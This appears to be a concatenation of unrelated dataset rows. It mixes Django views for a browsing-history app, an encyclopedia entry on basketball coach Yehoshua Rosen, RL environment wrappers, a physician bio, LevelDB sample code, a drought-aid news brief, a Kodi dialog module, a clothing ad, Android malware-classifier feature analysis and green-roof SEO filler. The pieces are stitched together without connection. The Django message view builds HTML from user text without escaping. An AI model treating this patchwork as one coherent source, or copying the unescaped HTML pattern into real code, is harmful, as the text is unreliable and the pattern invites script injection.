            if len(data) > 5:
                break
    return {'res': data}
@login_required
@ajax_request
def get_messages(request):
    """Return every message posted on the given URL, newest first."""
    url = request.GET.get('url', '')
    messages = EyeHistoryMessage.objects.filter(
        eyehistory__url=url).order_by('-post_time').select_related()

    def linkify(match):
        # Turn an @mention into a link to that user's profile page.
        return '<a href="http://eyebrowse.csail.mit.edu/users/%s">%s</a>' % (
            match.group(1), match.group(0))

    message_list = []
    for msg in messages:
        hist = msg.eyehistory
        message_list.append({
            'message': twitter_username_re.sub(linkify, msg.message),
            'post_time': str(msg.post_time),
            'username': hist.user.username,
            'pic_url': gravatar_for_user(hist.user),
            'user_url': '%s/users/%s' % (BASE_URL, hist.user.username),
            'hum_time': humanize_time(
                timezone.now() - msg.post_time) + ' ago',
        })
    return {
        'result': {
            'messages': message_list,
        }
    }
@login_required
@ajax_request
def active(request):
    """List recent visitors of a URL, split into page-level and
    domain-level viewers, bucketed by how recently they were seen.

    Unlike bubble_info, this does not restrict to followed users.
    """
    url = request.GET.get('url', '')
    domain = url_domain(url)

    # Only consider activity from the last 7 days.
    timestamp = timezone.now() - datetime.timedelta(days=7)

    used_users = []
    active_users = []   # visited this exact URL
    active_dusers = []  # visited the same domain only

    eyehists = EyeHistory.objects.filter(
        (Q(url=url) | Q(domain=domain)) &
        Q(start_time__gt=timestamp) &
        ~Q(user_id=request.user.id)
    ).order_by('-end_time').select_related()

    for eyehist in eyehists:
        if len(used_users) >= 6:  # cap at six distinct users total
            break
        user = eyehist.user
        if user not in used_users:
            # Recency bucket: 0 = <5 min, 1 = <1 h, 2 = <24 h, 3 = older.
            old_level = 3
            if eyehist.end_time > \
                    (timezone.now() - datetime.timedelta(minutes=5)):
                old_level = 0
            elif eyehist.end_time > \
                    (timezone.now() - datetime.timedelta(hours=1)):
                old_level = 1
            elif eyehist.end_time > \
                    (timezone.now() - datetime.timedelta(hours=24)):
                old_level = 2
            if url == eyehist.url:
                active_users.append({'username': user.username,
                                     'pic_url': gravatar_for_user(user),
                                     'resourceURI': '%s/users/%s' % (BASE_URL, user.username),
                                     'old_level': old_level,
                                     'time_ago': humanize_time(
                                         timezone.now() - eyehist.end_time)
                                     })
            else:
                active_dusers.append({'username': user.username,
                                      'pic_url': gravatar_for_user(user),
                                      'resourceURI': '%s/users/%s' % (BASE_URL, user.username),
                                      'old_level': old_level,
                                      'time_ago': humanize_time(
                                          timezone.now() - eyehist.end_time)
                                      })
            used_users.append(user)

    return {
        'result': {
            'page': active_users,
            'domain': active_dusers
        }
    }
def get_stats(visits):
    """Summarize an EyeHistory queryset as (visit-count text, avg-time text).

    The average is total_time (milliseconds) over the number of visits,
    humanized with "minute(s)" abbreviated to "min".
    """
    count = visits.count()
    count_text = '1 visit' if count == 1 else '%s visits' % (count)

    if count == 0:
        time = '0 seconds'
    else:
        total = visits.aggregate(Sum('total_time'))['total_time__sum']
        time = humanize_time(datetime.timedelta(
            milliseconds=float(total) / float(count)))
        time = re.sub('minutes', 'min', time)
        time = re.sub('minute', 'min', time)
    return count_text, time
@login_required
@ajax_request
def stats(request):
    """Visit statistics for a URL: the requester's and everyone's visit
    counts / average times, for both the exact page and its domain, plus
    the requester's rating of the page and the domain's aggregate score.
    """
    url = request.GET.get('url', '')

    my_user = get_object_or_404(User, username=request.user.username)

    my_visits = EyeHistory.objects.filter(user=my_user, url=url)
    my_count, my_time = get_stats(my_visits)

    total_visits = EyeHistory.objects.filter(url=url)
    total_count, total_time = get_stats(total_visits)

    domain = url_domain(url)

    my_dvisits = EyeHistory.objects.filter(user=my_user, domain=domain)
    my_dcount, my_dtime = get_stats(my_dvisits)

    total_dvisits = EyeHistory.objects.filter(domain=domain)
    total_dcount, total_dtime = get_stats(total_dvisits)

    # NOTE: `domain` is rebound here from a string to a Domain instance.
    domain, _ = Domain.objects.get_or_create(url=domain)
    page, _ = Page.objects.get_or_create(url=url, domain=domain)
    domain_score = domain.agg_score

    score = 0
    # NOTE(review): `error` is assigned but never returned — confirm intent.
    error = "Success"
    try:
        rating = Ratings.objects.get(user=my_user, page=page)
        score = rating.score
    except Ratings.DoesNotExist:
        error = "Failure: Rating does not exist"

    res = {'my_count': my_count,
           'my_time': my_time,
           'total_count': total_count,
           'total_time': total_time,
           'my_dcount': my_dcount,
           'my_dtime': my_dtime,
           'total_dcount': total_dcount,
           'total_dtime': total_dtime,
           'score': score,
           'domain_score': domain_score
           }
    return {
        'result': res
    }
|
ROSEN, YEHOSHUA (1918–2002), Israeli basketball coach. Known in Israel as "Mister Basketball" and considered one of the outstanding coaches in the country, Rosen came to Israel with his family from Egypt in the 1920s and immediately began to play basketball. At the age of 14 he was already playing on the Maccabi Tel Aviv senior team, continuing with them into the 1940s. In 1947 he was named coach of Israel's national basketball team and led it to three European tournament finals. In 1953 he became the coach of Maccabi Tel Aviv, running the team 18 years and winning 12 national championships and nine state cups. In 1984 he led Hapoel Tel Aviv to the state cup. Rosen coached for 40 years, until his retirement at the end of the 1980s, mentoring some of Israel's top homegrown players, such as Mickey *Berkowitz and Doron Jamchi. He was awarded the Israel Prize in 1989 for his contribution to Israeli basketball.
E. Sahar, "Not just a coach, but also teacher and educator," in: Ha'aretz (Feb. 7, 2002).
"Rosen, Yehoshua." Encyclopaedia Judaica. . Encyclopedia.com. 25 Apr. 2019 <https://www.encyclopedia.com>.
|
import contextlib
import os
from abc import ABC, abstractmethod
from baselines.common.tile_images import tile_images
class AlreadySteppingError(Exception):
    """
    Raised when an asynchronous step is running while
    step_async() is called again.
    """

    def __init__(self):
        super().__init__('already running an async step')
class NotSteppingError(Exception):
    """
    Raised when an asynchronous step is not running but
    step_wait() is called.
    """

    def __init__(self):
        super().__init__('not running an async step')
class VecEnv(ABC):
    """
    An abstract asynchronous, vectorized environment.
    Used to batch data from multiple copies of an environment, so that
    each observation becomes a batch of observations, and the expected
    action is a batch of actions to be applied per-environment.
    """
    # Idempotence guard for close().
    closed = False
    # Lazily created image viewer used by render(mode='human').
    viewer = None

    metadata = {
        'render.modes': ['human', 'rgb_array']
    }

    def __init__(self, num_envs, observation_space, action_space):
        self.num_envs = num_envs
        self.observation_space = observation_space
        self.action_space = action_space

    @abstractmethod
    def reset(self):
        """
        Reset all the environments and return an array of
        observations, or a dict of observation arrays.

        If step_async is still doing work, that work will
        be cancelled and step_wait() should not be called
        until step_async() is invoked again.
        """
        pass

    @abstractmethod
    def step_async(self, actions):
        """
        Tell all the environments to start taking a step
        with the given actions.
        Call step_wait() to get the results of the step.

        You should not call this if a step_async run is
        already pending.
        """
        pass

    @abstractmethod
    def step_wait(self):
        """
        Wait for the step taken with step_async().

        Returns (obs, rews, dones, infos):
         - obs: an array of observations, or a dict of
                arrays of observations.
         - rews: an array of rewards
         - dones: an array of "episode done" booleans
         - infos: a sequence of info objects
        """
        pass

    def close_extras(self):
        """
        Clean up the extra resources, beyond what's in this base class.
        Only runs when not self.closed.
        """
        pass

    def close(self):
        """Close the viewer and any subclass resources, exactly once."""
        if self.closed:
            return
        if self.viewer is not None:
            self.viewer.close()
        self.close_extras()
        self.closed = True

    def step(self, actions):
        """
        Step the environments synchronously.

        This is available for backwards compatibility.
        """
        self.step_async(actions)
        return self.step_wait()

    def render(self, mode='human'):
        """Render all environments tiled into a single image."""
        imgs = self.get_images()
        bigimg = tile_images(imgs)
        if mode == 'human':
            self.get_viewer().imshow(bigimg)
            return self.get_viewer().isopen
        elif mode == 'rgb_array':
            return bigimg
        else:
            raise NotImplementedError

    def get_images(self):
        """
        Return RGB images from each environment
        """
        raise NotImplementedError

    @property
    def unwrapped(self):
        # Recurse through wrapper layers to the innermost VecEnv.
        if isinstance(self, VecEnvWrapper):
            return self.venv.unwrapped
        else:
            return self

    def get_viewer(self):
        # Import lazily so gym's rendering deps are only needed when used.
        if self.viewer is None:
            from gym.envs.classic_control import rendering
            self.viewer = rendering.SimpleImageViewer()
        return self.viewer
class VecEnvWrapper(VecEnv):
    """
    An environment wrapper that applies to an entire batch
    of environments at once.
    """

    def __init__(self, venv, observation_space=None, action_space=None):
        self.venv = venv
        # Spaces default to the wrapped env's spaces unless overridden.
        super().__init__(
            num_envs=venv.num_envs,
            observation_space=observation_space or venv.observation_space,
            action_space=action_space or venv.action_space)

    def step_async(self, actions):
        """Forward the async step to the wrapped env."""
        self.venv.step_async(actions)

    @abstractmethod
    def reset(self):
        pass

    @abstractmethod
    def step_wait(self):
        pass

    def close(self):
        """Close the wrapped env."""
        return self.venv.close()

    def render(self, mode='human'):
        """Delegate rendering to the wrapped env."""
        return self.venv.render(mode=mode)

    def get_images(self):
        """Delegate image collection to the wrapped env."""
        return self.venv.get_images()

    def __getattr__(self, name):
        # Transparently proxy public attributes to the wrapped env, but
        # refuse private ones so typos don't silently resolve downstream.
        if name.startswith('_'):
            raise AttributeError("attempted to get missing private attribute '{}'".format(name))
        return getattr(self.venv, name)
class VecEnvObservationWrapper(VecEnvWrapper):
    """Wrapper that passes every batched observation through process()."""

    @abstractmethod
    def process(self, obs):
        """Map a raw batched observation to its transformed form."""
        pass

    def reset(self):
        return self.process(self.venv.reset())

    def step_wait(self):
        obs, rews, dones, infos = self.venv.step_wait()
        return self.process(obs), rews, dones, infos
class CloudpickleWrapper(object):
    """
    Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
    """

    def __init__(self, x):
        self.x = x

    def __getstate__(self):
        # Serialize with cloudpickle so lambdas/closures survive.
        import cloudpickle
        return cloudpickle.dumps(self.x)

    def __setstate__(self, serialized):
        # cloudpickle output is plain-pickle compatible on load.
        import pickle
        self.x = pickle.loads(serialized)
@contextlib.contextmanager
def clear_mpi_env_vars():
    """
    from mpi4py import MPI will call MPI_Init by default. If the child process has MPI environment variables, MPI will think that the child process is an MPI process just like the parent and do bad things such as hang.
    This context manager is a hacky way to clear those environment variables temporarily such as when we are starting multiprocessing
    Processes.
    """
    saved = {key: value for key, value in list(os.environ.items())
             if key.startswith(('OMPI_', 'PMI_'))}
    for key in saved:
        del os.environ[key]
    try:
        yield
    finally:
        # Restore whatever we removed, even if the body raised.
        os.environ.update(saved)
|
Dr. Jain is Board Certified in Family Medicine with the America Board of Family Medicine (ABFM). She graduated from medical school in India in 2001 and completed residency in Family Medicine in 2006 from the University of Tennessee Family Practice Program with Jackson Madison County General Hospital. She is a member of the American Academy of Family Physicians (AAFP) and American Society of Bariatric Physicians (ASBP).
Dr. Jain's special interests include pediatrics, women's health, hormonal therapy and bariatrics (weight management).
She is the proud mother of two kids, Sachi and Aadi. She is married to Dr. Sriv and has lived in Dyersburg for more than 10 years.
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import json
import numpy as np
#import caffe
import leveldb
def write_to_db_example(use_caffe_datum=False):
    """Write N dummy 3x32x32 uint8 images with int64 labels into LevelDB.

    Records are stored either as serialized Caffe Datum protobufs or as
    ASCII-encoded JSON dicts, keyed by a zero-padded record index.
    """
    N = 1000
    X = np.zeros((N, 3, 32, 32), dtype=np.uint8)
    y = np.zeros(N, dtype=np.int64)

    leveldb_dir_path = './myleveldb'
    db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)

    if use_caffe_datum:
        #import caffe
        import caffe_pb2

        for idx in range(N):
            # REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
            #datum = caffe.proto.caffe_pb2.Datum()
            record = caffe_pb2.Datum()
            record.channels = X.shape[1]
            record.height = X.shape[2]
            record.width = X.shape[3]
            record.data = X[idx].tobytes()  # or .tostring() if numpy < 1.9.
            record.label = int(y[idx])
            # The encode is only essential in Python 3.
            db.Put('{:08}'.format(idx).encode('ascii'), record.SerializeToString())
    else:
        for idx in range(N):
            record = {
                'channels': X.shape[1],
                'height': X.shape[2],
                'width': X.shape[3],
                'data': X[idx].tolist(),
                'label': int(y[idx]),
            }
            # The encode is only essential in Python 3.
            db.Put('{:08}'.format(idx).encode('ascii'),
                   json.dumps(record).encode('ascii'))

    #db.Delete(b'00000000')

    #--------------------
    print(db.GetStats())
def read_from_db_example(use_caffe_datum=False):
    """Read record b'00000000' from LevelDB and decode it to (image, label).

    Mirrors write_to_db_example: Caffe Datum protobuf or JSON encoding.
    """
    leveldb_dir_path = './myleveldb'
    db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)

    key = b'00000000'
    try:
        raw_datum = db.Get(key)
    except KeyError:
        print('Invalid key, {}.'.format(key))
        return

    if use_caffe_datum:
        #import caffe
        import caffe_pb2

        # REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
        #datum = caffe.proto.caffe_pb2.Datum()
        datum = caffe_pb2.Datum()
        datum.ParseFromString(raw_datum)

        # FIX: np.fromstring is deprecated for binary data (and removed in
        # newer NumPy); np.frombuffer is the zero-copy replacement.
        x = np.frombuffer(datum.data, dtype=np.uint8)
        x = x.reshape(datum.channels, datum.height, datum.width)
        y = datum.label
    else:
        datum = json.loads(raw_datum.decode('ascii'))
        x = np.array(datum['data'], dtype=np.uint8)
        x = x.reshape(datum['channels'], datum['height'], datum['width'])
        y = datum['label']

    print(x.shape, y)
def key_value_example(use_caffe_datum=False):
    """Iterate every (key, value) pair in the LevelDB and decode each record."""
    leveldb_dir_path = './myleveldb'
    db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)

    if use_caffe_datum:
        #import caffe
        import caffe_pb2

        for k, v in db.RangeIter():
            # REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
            #datum = caffe.proto.caffe_pb2.Datum()
            datum = caffe_pb2.Datum()
            datum.ParseFromString(v)

            # FIX: np.fromstring is deprecated for binary data (and removed
            # in newer NumPy); np.frombuffer is the zero-copy replacement.
            x = np.frombuffer(datum.data, dtype=np.uint8)
            x = x.reshape(datum.channels, datum.height, datum.width)
            y = datum.label

            print(k.decode(), x.shape, y)
    else:
        for k, v in db.RangeIter():
            datum = json.loads(v.decode('ascii'))
            x = np.array(datum['data'], dtype=np.uint8)
            x = x.reshape(datum['channels'], datum['height'], datum['width'])
            y = datum['label']

            print(k.decode(), x.shape, y)
def main():
    """Demo driver; uncomment the read/iterate examples as needed."""
    # Usage:
    #   For using Caffe Datum:
    #       protoc --python_out=. caffe.proto
    use_caffe_datum = False
    write_to_db_example(use_caffe_datum)
    #read_from_db_example(use_caffe_datum)
    #key_value_example(use_caffe_datum)


#--------------------------------------------------------------------

if __name__ == '__main__':
    main()
|
Summer's drought and excessive heat have led the U.S. Department of Agriculture to declare 44 Illinois counties natural disaster areas.
Farmers and ranchers in another 33 counties also qualify for assistance because they are contiguous to the affected areas.
The declaration means farmers and ranchers can qualify for low-interest emergency loans to help cover part of their actual losses. Farmers in eligible counties have eight months from Oct. 31 to apply.
Other assistance programs also are available.
Local counties included in the 44 counties are: Macon, Champaign, Christian, McLean and Piatt.
|
from threading import Thread, RLock
import xbmc
import xbmcaddon
import xbmcgui
def select_ext(title, populator, tasks_count, sort_function=None):
    """Show the source-selection dialog and return the user's pick (or None)."""
    addon_path = xbmcaddon.Addon().getAddonInfo('path').decode('utf-8')
    dialog = SelectorDialog("DialogSelect.xml", addon_path, title=title,
                            populator=populator, steps=tasks_count,
                            sort_function=sort_function)
    with ExtendedDialogHacks():
        dialog.doModal()
        chosen = dialog.get_selection()
        del dialog
    return chosen
class FanArtWindow(xbmcgui.WindowDialog):
    """Full-screen backdrop: the addon's fanart, overlaid with the current
    list item's fanart when one is set."""

    def __init__(self):
        backdrop = xbmcgui.ControlImage(
            0, 0, 1280, 720, xbmcaddon.Addon().getAddonInfo('fanart'))
        self.addControl(backdrop)

        fanart = xbmc.getInfoLabel('ListItem.Property(Fanart_Image)')
        # "Fanart_Image" is the unresolved-label sentinel — treat as absent.
        if fanart and fanart != "Fanart_Image":
            self.addControl(xbmcgui.ControlImage(0, 0, 1280, 720, fanart))
class ExtendedDialogHacks(object):
    """Context manager shown around a modal dialog: displays a fanart
    backdrop and can optionally auto-close progress/info dialogs.

    NOTE(review): all auto-hide flags are hard-coded off below, so the
    background task never starts; only the fanart window is active.
    """

    def __init__(self):
        self.active = False

        # Auto-hide behaviour disabled by default (see class note).
        self.hide_progress = False
        self.hide_info = False

        self.autohidedialogs = False
        if self.autohidedialogs:
            self.hide_progress = False
            self.hide_info = False

            if not self.hide_progress and not self.hide_info:
                self.autohidedialogs = False

    def __enter__(self):
        self.active = True

        # self.numeric_keyboard = None
        self.fanart_window = FanArtWindow()

        ## Keyboard hack
        # if plugin.get_setting(SETTING_ADVANCED_KEYBOARD_HACKS, converter=bool):
        #     self.numeric_keyboard = xbmcgui.Window(10109)
        #     Thread(target = lambda: self.numeric_keyboard.show()).start()
        #     wait_for_dialog('numericinput', interval=50)

        # Show fanart background
        self.fanart_window.show()

        # Run background task
        if self.autohidedialogs:
            Thread(target=self.background_task).start()

    def background_task(self):
        """Poll every 100 ms and close progress/info dialogs while active."""
        xbmc.sleep(1000)
        while not xbmc.abortRequested and self.active:
            if self.hide_progress:
                active_window = xbmcgui.getCurrentWindowDialogId()
                # 10101 / 10151 are the progress dialog window ids.
                if active_window in [10101, 10151]:
                    xbmc.executebuiltin("Dialog.Close(%d, true)" % active_window)

            if self.hide_info:
                if xbmc.getCondVisibility("Window.IsActive(infodialog)"):
                    xbmc.executebuiltin('Dialog.Close(infodialog, true)')

            xbmc.sleep(100)

    def __exit__(self, exc_type, exc_value, traceback):
        # Stop the background task (if any) and tear down the backdrop.
        self.active = False

        # if self.numeric_keyboard is not None:
        #     self.numeric_keyboard.close()
        #     del self.numeric_keyboard
        #     xbmc.executebuiltin("Dialog.Close(numericinput, true)")

        self.fanart_window.close()
        del self.fanart_window
class SelectorDialog(xbmcgui.WindowXMLDialog):
    """Two-level selection dialog populated asynchronously.

    The root list shows one entry per source; entering a source with more
    than one link shows its links. ``populator`` is consumed on a worker
    thread, so all list mutation is guarded by ``self.lock``.
    """

    def __init__(self, *args, **kwargs):
        xbmcgui.WindowXMLDialog.__init__(self)
        self.title = kwargs['title']
        self.populator = kwargs['populator']
        self.steps = kwargs['steps']
        self.sort_function = kwargs['sort_function']

        # items: list of (source_label, [link_dict, ...]) pairs.
        self.items = []
        self.selection = None
        # Index of the source whose links are being shown; -1 = root list.
        self.insideIndex = -1
        self.completed_steps = 0

        self.thread = None
        self.lock = RLock()

    def get_selection(self):
        """ get final selection """
        return self.selection

    def onInit(self):
        # set title
        self.label = self.getControl(1)
        self.label.setLabel(self.title)

        # Hide ok button
        self.getControl(5).setVisible(False)

        # Get active list
        try:
            self.list = self.getControl(6)
            self.list.controlLeft(self.list)
            self.list.controlRight(self.list)
            self.getControl(3).setVisible(False)
        except:
            # Skin variant without control 6 — fall back to control 3.
            self.list = self.getControl(3)

        self.setFocus(self.list)

        # populate list
        self.thread = Thread(target=self._populate)
        self.thread.start()

    def onAction(self, action):
        # Back/close-style actions: leave a sub-list, or close from root.
        if action.getId() in (9, 10, 92, 216, 247, 257, 275, 61467, 61448,):
            if self.insideIndex == -1:
                self.close()
            else:
                self._inside_root(select=self.insideIndex)

    def onClick(self, controlID):
        if controlID == 6 or controlID == 3:
            num = self.list.getSelectedPosition()
            if num >= 0:
                if self.insideIndex == -1:
                    self._inside(num)
                else:
                    self.selection = self.items[self.insideIndex][1][num]
                    self.close()

    def onFocus(self, controlID):
        # Keep keyboard focus pinned to the active list control.
        if controlID in (3, 61):
            self.setFocus(self.list)

    def _inside_root(self, select=-1):
        """Rebuild the root list of sources; optionally reselect an entry."""
        with self.lock:
            self.list.reset()
            for source, links in self.items:
                if len(links) > 1:
                    source += " >>"
                listitem = xbmcgui.ListItem(source)
                try:
                    # Addon id is the third path segment ("plugin://<id>/...").
                    icon = xbmcaddon.Addon(id=links[0]['path'].split("/")[2]).getAddonInfo('icon')
                    listitem.setIconImage(icon)
                except:
                    pass
                self.list.addItem(listitem)

            if select >= 0:
                self.list.selectItem(select)
            self.insideIndex = -1

    def _inside(self, num):
        """Enter source *num*; single-link sources are selected immediately."""
        if num == -1:
            self._inside_root(select=self.insideIndex)
            return
        with self.lock:
            source, links = self.items[num]
            if len(links) == 1:
                self.selection = links[0]
                self.close()
                return

            self.list.reset()
            for item in links:
                listitem = xbmcgui.ListItem(item['label'])
                listitem.setProperty("Path", item['path'])
                try:
                    pluginid = item['path'].split("/")[2]
                    icon = xbmcaddon.Addon(id=pluginid).getAddonInfo('icon')
                    listitem.setIconImage(icon)
                except:
                    pass
                self.list.addItem(listitem)

            self.insideIndex = num

    def step(self):
        """Advance the progress counter shown in the dialog title."""
        self.completed_steps += 1
        # NOTE(review): relies on Python 2 integer division — under Python 3
        # this would be a float and the {1:d} format below would raise.
        progress = self.completed_steps * 100 / self.steps
        self.label.setLabel(u"{0} - {1:d}% ({2}/{3})".format(self.title, progress,
                                                             self.completed_steps, self.steps))

    def _populate(self):
        """Worker thread: drain the populator, merging results into the UI."""
        xbmc.sleep(500)  # Delay population to let ui settle
        self.label.setLabel(self.title)
        for result in self.populator():
            self.step()
            if not result:
                continue
            with self.lock:
                # Remember selected item
                selectedItem = None
                if self.insideIndex == -1:
                    selectedIndex = self.list.getSelectedPosition()
                else:
                    selectedIndex = self.insideIndex
                if selectedIndex >= 0:
                    selectedItem = self.items[selectedIndex]

                # Add new item
                self.items.extend(result)
                if self.sort_function:
                    self.items = sorted(self.items, key=self.sort_function)
                #self.items.sort()

                # Retrived new selection-index
                if selectedItem is not None:
                    selectedIndex = self.items.index(selectedItem)
                    if self.insideIndex != -1:
                        self.insideIndex = selectedIndex

                # Update only if in root
                if self.insideIndex == -1:
                    self._inside_root(select=selectedIndex)
                    self.setFocus(self.list)
        pass
|
This is a cool little dress for your wee one to romp in. It features two little press studs at the neck for easy dressing. The adorable tiger pattern will hide the inevitable stains, and the red piping around the neckline gives it a lovely retro feel.
100% eco and fair trade cotton.
|
#!/usr/bin/python
# ADAGIO Android Application Graph-based Classification
# featureAnalysis.py >> Analysis of features from SVM linear model
# Copyright (c) 2016 Hugo Gascon <hgascon@mail.de>
import os
import numpy as np
import networkx as nx
from random import shuffle
from adagio.common import ml
"""
Example:
import featureAnalysis as fa
w_binary = clf.best_estimator_.coef_[0]
w_agg = fa.aggregate_binary_svm_weights(w, 13)
"""
def print_largest_weights(w_agg, n, bits=15):
    """Print (and return) the ``n`` largest aggregated SVM weights.

    Args:
        w_agg: 1-D array of aggregated weights.
        n: number of top weights to report.
        bits: width of the binary label printed for each index
            (default 15, matching the rest of this module).

    Returns:
        List of ``(weight, binary_label)`` pairs, largest weight first.
    """
    idx = w_agg.argsort()[::-1][:n]
    w_agg_highest = w_agg[idx]
    labels = [np.binary_repr(i, bits) for i in idx]
    # list(...) so the pairs are actually shown on Python 3, where zip is lazy
    pairs = list(zip(w_agg_highest, labels))
    print(pairs)
    return pairs
def aggregate_binary_svm_weights(w_binary, expansion_bits):
    """ Return the aggregated version of the SVM weight vector considering
    the binary representation length of the original non-binary feature.

    Args:
        w_binary: an array of SVM weights related to binary features.
        expansion_bits: the number of bits used to represent each feature in
            the original feature vector.

    Returns:
        w: the aggregated version of the SVM weight vector
    """
    # // keeps this an int: plain / returns a float on Python 3, which
    # would make range() below raise TypeError
    feature_idx = len(w_binary) // expansion_bits
    w = np.array([sum(w_binary[expansion_bits * i:expansion_bits * (i + 1)])
                  for i in range(feature_idx)])
    return w
def compute_neighborhoods_per_weights(d, w, n_weights, n_files=300):
    """ Write report with info about highest ranked neighborhoods in samples
    according to the weights learnt by the linear SVM model.

    Args:
        d: directory of the files to be processed
        w: linear SVM weights
        n_weights: number of weights to analyze
        n_files: number of files to process from directory d

    Returns:
        Outputs the file feature_analysis.txt
    """
    # read_files already returns paths joined with d
    files = read_files(d, "fcgnx", n_files)
    sorted_weights_idx = w.argsort()[::-1]
    f_out = "feature_analysis.txt"
    print("[*] Writing file {0}...".format(f_out))
    # text mode ('w', not 'wb'): we write str below
    with open(f_out, 'w') as fd:
        for fn in files:
            # pass n_weights by keyword: the 4th positional parameter of
            # get_high_ranked_neighborhoods is show_small, not weights
            neighborhoods, n_nodes = get_high_ranked_neighborhoods(
                fn, w, sorted_weights_idx, weights=n_weights)
            try:
                if neighborhoods:
                    fd.write("\n\n#########################################\n\n")
                    fd.write(os.path.basename(fn) + "\n\n")
                    fd.write("nodes: {0}\n\n".format(n_nodes))
                    fd.write("\n".join(neighborhoods))
            except Exception:  # best effort: skip samples whose report fails
                pass
    print("[*] File written.")
def get_high_ranked_neighborhoods(fcgnx_file, w, sorted_weights_idx,
                                  show_small=False, weights=1):
    """Collect the neighborhoods in one sample graph that match the
    highest ranked SVM weights.

    Args:
        fcgnx_file: pickled networkx graph of the sample.
        w: linear SVM weight vector.
        sorted_weights_idx: weight indices sorted by descending weight.
        show_small: also report matching nodes that have no neighbors.
        weights: number of weights (with at least one match) to report.

    Returns:
        (neighborhoods, n_nodes): list of report strings and the total
        node count of the hashed graph.
    """
    g = nx.read_gpickle(fcgnx_file)
    g_hash = ml.neighborhood_hash(g)
    # compute up front: previously only set once the weight budget was
    # exhausted, leaving n_nodes unbound when it never was
    n_nodes = g_hash.number_of_nodes()
    neighborhoods = []
    remaining_weights = weights
    for idx in sorted_weights_idx:
        if remaining_weights <= 0:
            break
        label_bin = np.binary_repr(idx, 15)
        label = np.array([int(i) for i in label_bin])
        matching_neighborhoods = []
        # .items() instead of .iteritems() for py2/py3 compatibility
        for m, nh in g_hash.node.items():
            if np.array_equal(nh["label"], label):
                neighbors_l = g_hash.neighbors(m)
                if neighbors_l:
                    neighbors = '\n'.join([str(i) for i in neighbors_l])
                    matching_neighborhoods.append("{0}\n{1}\n{2}\n".format(w[idx],
                                                  m, neighbors))
                else:
                    if show_small:
                        matching_neighborhoods.append("{0}\n{1}\n".format(w[idx], m))
        if matching_neighborhoods:
            remaining_weights -= 1
            neighborhoods += matching_neighborhoods
    del g
    del g_hash
    return neighborhoods, n_nodes
def add_weights_to_nodes(g, w, show_labels=True):
    """Annotate a copy of graph ``g`` with SVM-weight based colors/labels.

    Each node's hashed label is interpreted as an index into ``w``; the
    node weight is then aggregated with its callers' weights, normalized,
    and written into graphviz-style ``style``/``fillcolor``/``label``
    attributes for plotting.

    Args:
        g: networkx graph of a sample.
        w: linear SVM weight vector indexed by hashed node label.
        show_labels: keep function names (plus weight) as node labels;
            otherwise blank the labels.

    Returns:
        The weighted copy of the hashed graph.
    """
    g_hash = ml.neighborhood_hash(g)
    # initialize the weight for every node in g_hash
    # (.items() instead of .iteritems() for py2/py3 compatibility)
    for n, nh in g_hash.node.items():
        idx = int("".join([str(i) for i in nh["label"]]), 2)
        w_nh = w[idx]
        g_hash.node[n]["label"] = w_nh
    # create a copy of the weighted graph
    g_hash_weighted = g_hash.copy()
    # aggregate the weights of each node with the
    # original weight of its caller
    for n, nh in g_hash.node.items():
        for neighbor in g_hash.neighbors(n):
            g_hash_weighted.node[neighbor]["label"] += g_hash.node[n]["label"]
    # create array of the node weights
    g_weights = []
    for n, nh in g_hash_weighted.node.items():
        g_weights.append(nh["label"])
    # normalize weights to map them onto a gray scale for plotting
    # NOTE(review): original comment said "between 0.5 and 1" but
    # normalize_weights defaults to [0, 1] — confirm intended range
    g_weights = np.array(g_weights)
    g_weights.sort()
    g_weights_norm = normalize_weights(g_weights)
    g_weights_norm = g_weights_norm[::-1]
    d_w_norm = dict(zip(g_weights, g_weights_norm))
    # add normalized weight as color to each node
    for n, nh in g_hash_weighted.node.items():
        # renamed from `w` to avoid shadowing the weight-vector parameter
        node_w = g_hash_weighted.node[n]["label"]
        g_hash_weighted.node[n]["style"] = "filled"
        g_hash_weighted.node[n]["fillcolor"] = "0.000 0.000 {0}".format(d_w_norm[node_w])
    # write function name in the label of the node or remove label
    if show_labels:
        for n, nh in g_hash_weighted.node.items():
            node_text = (n[0].split("/")[-1] + n[1] + "\n" +
                         str(g_hash_weighted.node[n]["label"]))
            g_hash_weighted.node[n]["label"] = node_text
    else:
        for n, nh in g_hash_weighted.node.items():
            g_hash_weighted.node[n]["label"] = ""
    return g_hash_weighted
def normalize_weights(a, imin=0.0, imax=1.0):
    """Linearly rescale array ``a`` into the interval [imin, imax].

    Args:
        a: numpy array of weights.
        imin: lower bound of the target interval.
        imax: upper bound of the target interval.

    Returns:
        Array of the same shape with values mapped into [imin, imax].
    """
    dmin = a.min()
    dmax = a.max()
    if dmax == dmin:
        # degenerate case: all values equal — avoid division by zero / NaN
        return np.full_like(np.asarray(a, dtype=float), imax)
    return imin + (imax - imin) * (a - dmin) / (dmax - dmin)
def read_files(d, file_extension, max_files=0):
    """Return a shuffled list of paths in ``d`` whose (lowercased) names
    end with ``file_extension``.

    Args:
        d: directory to scan.
        file_extension: suffix to match against the lowercased file name.
        max_files: cap on the number of paths returned; 0 means no limit.

    Returns:
        List of full paths (directory joined with file name), shuffled.
    """
    matched = [os.path.join(d, name)
               for name in os.listdir(d)
               if name.lower().endswith(file_extension)]
    shuffle(matched)
    # max_files == 0 means "return everything"
    return matched if max_files == 0 else matched[:max_files]
|
That way, you can contribute to mitigating global warming while at the same time getting creative with your own dwelling. Put simply, you can kill two birds with one stone with this single approach. This type of green infrastructure is also good for your house, as it can save energy: by using it, you can reduce energy consumption by up to 5% compared to your usual usage.
Tags: roofing green bay, green roof nyc, green roofing, green roof companies.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.